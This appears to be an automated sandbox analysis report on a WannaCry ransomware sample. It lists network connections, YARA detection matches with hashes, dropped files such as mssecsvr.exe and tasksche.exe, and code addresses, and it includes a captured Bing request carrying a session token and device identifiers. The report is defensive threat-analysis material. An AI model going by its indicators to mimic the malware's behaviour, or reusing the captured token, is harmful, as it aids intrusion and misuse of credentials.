                  Source: unknownTCP traffic detected without corresponding DNS query: 23.211.4.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.211.4.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.211.4.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.211.4.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.211.4.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 145.127.252.214
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.211.4.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.211.4.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.211.4.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 71.5.243.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 62.39.1.80
                  Source: unknownTCP traffic detected without corresponding DNS query: 137.91.14.25
                  Source: unknownTCP traffic detected without corresponding DNS query: 55.147.194.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 47.78.233.175
                  Source: unknownTCP traffic detected without corresponding DNS query: 108.102.227.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 53.83.119.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 100.90.128.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.100.22.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.194.37.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 216.55.64.225
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.100.22.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 169.125.200.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 90.223.94.120
                  Source: unknownTCP traffic detected without corresponding DNS query: 216.98.78.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.93.28.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 8.47.130.125
                  Source: unknownTCP traffic detected without corresponding DNS query: 161.28.216.254
                  Source: unknownTCP traffic detected without corresponding DNS query: 70.120.129.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 131.178.131.95
                  Source: unknownTCP traffic detected without corresponding DNS query: 182.229.80.238
                  Source: unknownTCP traffic detected without corresponding DNS query: 25.218.25.42
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.36.21.234
                  Source: unknownTCP traffic detected without corresponding DNS query: 187.42.237.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 26.54.61.208
                  Source: unknownTCP traffic detected without corresponding DNS query: 9.183.193.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 93.146.181.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 180.228.44.56
                  Source: unknownHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 87284Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1671732236826&AC=1&CPH=4ef661f2
                  Source: unknownHTTPS traffic detected: 23.211.4.90:443 -> 192.168.2.3:49719 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.3:49861 version: TLS 1.2
                  Source: mssecsvr.exe, 00000005.00000002.255951396.0000000000C2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: Yara matchFile source: xIwkOnjSIa.dll, type: SAMPLE
                  Source: Yara matchFile source: 8.0.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.mssecsvr.exe.24d38c8.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.0.mssecsvr.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.mssecsvr.exe.1fab084.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.0.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.0.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.0.mssecsvr.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.mssecsvr.exe.24e2948.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.0.mssecsvr.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.0.mssecsvr.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.mssecsvr.exe.24e2948.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.mssecsvr.exe.1fba104.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.0.mssecsvr.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.0.mssecsvr.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.mssecsvr.exe.24de8e8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.mssecsvr.exe.1fb60a4.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.mssecsvr.exe.1fba104.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000000.251873515.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000000.244617734.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000000.250229077.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000000.245185564.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000000.245687308.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000000.252574980.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.764989096.000000000042E000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000000.250670381.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.770314076.00000000024E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000000.246578066.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.254798373.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.768457248.0000000001FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.259883284.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000000.254187170.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: mssecsvr.exe PID: 4252, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: mssecsvr.exe PID: 4672, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: mssecsvr.exe PID: 2220, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Windows\mssecsvr.exe, type: DROPPED

                  System Summary

                  barindex
                  Source: xIwkOnjSIa.dll, type: SAMPLEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 7.2.mssecsvr.exe.1fab084.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 7.2.mssecsvr.exe.24d38c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 8.0.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 8.0.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                  Source: 7.2.mssecsvr.exe.24d38c8.7.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 7.2.mssecsvr.exe.24d38c8.7.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                  Source: 8.2.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 8.2.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                  Source: 5.0.mssecsvr.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 5.0.mssecsvr.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                  Source: 7.2.mssecsvr.exe.1fab084.3.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 7.2.mssecsvr.exe.1fab084.3.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                  Source: 7.0.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 7.0.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                  Source: 5.0.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 5.0.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                  Source: 8.0.mssecsvr.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 8.0.mssecsvr.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                  Source: 7.2.mssecsvr.exe.24e2948.9.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 8.0.mssecsvr.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 8.0.mssecsvr.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                  Source: 8.0.mssecsvr.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 8.0.mssecsvr.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                  Source: 7.2.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 7.2.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                  Source: 7.2.mssecsvr.exe.24e2948.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 7.2.mssecsvr.exe.24e2948.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                  Source: 7.2.mssecsvr.exe.1fba104.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 7.2.mssecsvr.exe.1fba104.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                  Source: 5.0.mssecsvr.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 5.0.mssecsvr.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                  Source: 5.0.mssecsvr.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 5.0.mssecsvr.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                  Source: 5.2.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 5.2.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                  Source: 7.2.mssecsvr.exe.24de8e8.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 7.2.mssecsvr.exe.1fb60a4.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 7.2.mssecsvr.exe.1fba104.5.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: C:\Windows\mssecsvr.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: C:\Windows\mssecsvr.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                  Source: C:\Windows\tasksche.exeCode function: 9_2_00402F2C9_2_00402F2C
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0041B0D99_2_0041B0D9
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0041B8B99_2_0041B8B9
                  Source: C:\Windows\tasksche.exeCode function: 9_2_004149469_2_00414946
                  Source: C:\Windows\tasksche.exeCode function: 9_2_004101789_2_00410178
                  Source: C:\Windows\tasksche.exeCode function: 9_2_004049869_2_00404986
                  Source: C:\Windows\tasksche.exeCode function: 9_2_004292419_2_00429241
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0042727C9_2_0042727C
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0040CB239_2_0040CB23
                  Source: C:\Windows\tasksche.exeCode function: 9_2_004283FC9_2_004283FC
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0041AC049_2_0041AC04
                  Source: C:\Windows\tasksche.exeCode function: 9_2_00416C3F9_2_00416C3F
                  Source: C:\Windows\tasksche.exeCode function: 9_2_00401CC19_2_00401CC1
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0041F4D49_2_0041F4D4
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0041BCD99_2_0041BCD9
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0040C4FF9_2_0040C4FF
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0041B4AD9_2_0041B4AD
                  Source: C:\Windows\tasksche.exeCode function: 9_2_00417D789_2_00417D78
                  Source: C:\Windows\tasksche.exeCode function: 9_2_00427D049_2_00427D04
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0041450F9_2_0041450F
                  Source: C:\Windows\tasksche.exeCode function: 9_2_00415D9A9_2_00415D9A
                  Source: C:\Windows\tasksche.exeCode function: 9_2_004056109_2_00405610
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0041462B9_2_0041462B
                  Source: C:\Windows\tasksche.exeCode function: 9_2_00413EE39_2_00413EE3
                  Source: C:\Windows\tasksche.exeCode function: 9_2_004106F49_2_004106F4
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0040C7569_2_0040C756
                  Source: C:\Windows\tasksche.exeCode function: 9_2_004277C09_2_004277C0
                  Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dll
                  Source: Joe Sandbox ViewDropped File: C:\Windows\eee.exe 95EF1D077176B0DE86FB8BA7BF2AE56A08BF7944B05424A2F6E013ACDF5FD684
                  Source: xIwkOnjSIa.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                  Source: xIwkOnjSIa.dll, type: SAMPLEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 7.2.mssecsvr.exe.1fab084.3.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 7.2.mssecsvr.exe.24d38c8.7.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 8.0.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 8.0.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                  Source: 7.2.mssecsvr.exe.24d38c8.7.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 7.2.mssecsvr.exe.24d38c8.7.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                  Source: 8.2.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 8.2.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                  Source: 5.0.mssecsvr.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 5.0.mssecsvr.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                  Source: 7.2.mssecsvr.exe.1fab084.3.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 7.2.mssecsvr.exe.1fab084.3.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                  Source: 7.0.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 7.0.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                  Source: 5.0.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 5.0.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                  Source: 8.0.mssecsvr.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 8.0.mssecsvr.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                  Source: 7.2.mssecsvr.exe.24e2948.9.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 8.0.mssecsvr.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
